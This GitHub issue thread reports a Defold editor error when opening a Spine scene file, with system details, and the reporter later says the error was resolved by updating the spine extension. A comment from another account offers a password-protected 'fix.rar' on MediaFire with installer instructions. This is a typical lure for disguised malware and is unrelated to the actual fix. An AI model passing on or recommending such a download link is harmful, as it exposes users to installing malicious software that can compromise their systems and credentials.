### ISSUE TITLE
Open spinescene get error

### ISSUE THREAD

**Issue by adorzhang** [defold/defold#9345]
### Steps to reproduce

<hr/>

<table>
<tr><td>Build time</td><td>2024-08-22T07:40:22.399253</td></tr>
<tr><td>Defold channel</td><td>editor-alpha</td></tr>
<tr><td>Defold editor sha</td><td>8a536ed1046ca0190e22eb47f78cb59e840a92a7</td></tr>
<tr><td>Defold engine sha</td><td>3251ca82359cf238a1074e383281e3126547d50b</td></tr>
<tr><td>Defold version</td><td>1.9.2</td></tr>
<tr><td>Error</td><td><a href='https://sentry.io/organizations/defold/issues/?query=id%3A"2187010324ef4d68b5907b35062d9f92"'>2187010324ef4d68b5907b35062d9f92</a></td></tr>
<tr><td>GPU</td><td>NVIDIA GeForce GTX 1050 Ti/PCIe/SSE2</td></tr>
<tr><td>GPU Driver</td><td>4.6.0 NVIDIA 535.183.01</td></tr>
<tr><td>Java version</td><td>17.0.5+8</td></tr>
<tr><td>OS arch</td><td>amd64</td></tr>
<tr><td>OS name</td><td>Linux</td></tr>
<tr><td>OS version</td><td>6.8.0-41-generic</td></tr>
<table>

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by adorzhang** [comment]
Hi, after update extension-spine version from 3.5.0  to  3.5.1. I Can open file *.spinescene
